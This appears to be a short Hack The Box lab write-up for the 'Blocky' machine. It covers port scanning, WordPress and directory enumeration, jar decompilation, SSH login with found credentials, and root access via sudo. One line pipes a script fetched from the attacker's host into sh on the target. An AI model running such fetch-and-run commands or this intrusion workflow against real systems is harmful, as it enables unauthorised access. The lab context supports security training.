Hack The Box — Blocky Write-up

Blocky-HTB
Blocky — Easy — Linux

Lets start pwning it ❗️

Reconnaissance

The first thing to do it to use Linux built-in tool nmap to scan the ports of the machine.

nmap -sC -sV 10.10.10.37 -o nmap.txt
  • -sV: detect the version of the service used
  • -o: to output the result

Enumeration

Blocky website
wpscan --url http://blocky.com -e
gobuster dir -u http://blocky.com -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -o Bustydirectory.txt  -t 20
  • -u: target url
  • -w: word-list for brute-forcing
  • -o: output
  • -t: number of entries per second
sudo apt-get install jd-gui
jar xvf /decompile/BlockyCore.jar
jar xvf /decompile2/griefprevention-1.11.2-3.1.1.298.jar
  • Gaining access through www-data (using ftp)
  • Gaining access through Kernel Exploit(CVE-2017–6074)

Gaining a foothold

We checked the credentials against the wordpress login page and were failed to access it. Then we use ssh connection and got in to the machine.

ssh notch@10.10.10.37

Privilege Escalation

The tool that I have used to priv-escalate is PEASS. So now we have to put this ‘linpeas.sh’ on the machine and to do this we will use “curl”. Before that we will make our host live locally so that we can transfer it from our computer to the machine.

sudo python -m SimpleHTTPServer 80
curl 10.10.14.9/linpeas.sh |sh -a >linpriv.txt
less -r linpriv.txt
sudo su

Lessons Learned

  1. A Developer should not use weak response based on the validity of submitted credentials as this can lead to User Enumeration.
  2. Important/Sensitive files containing any type of “username” or “password” should not be kept publicly available.
  3. Users should not be given sudo privileges.

Unlisted

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store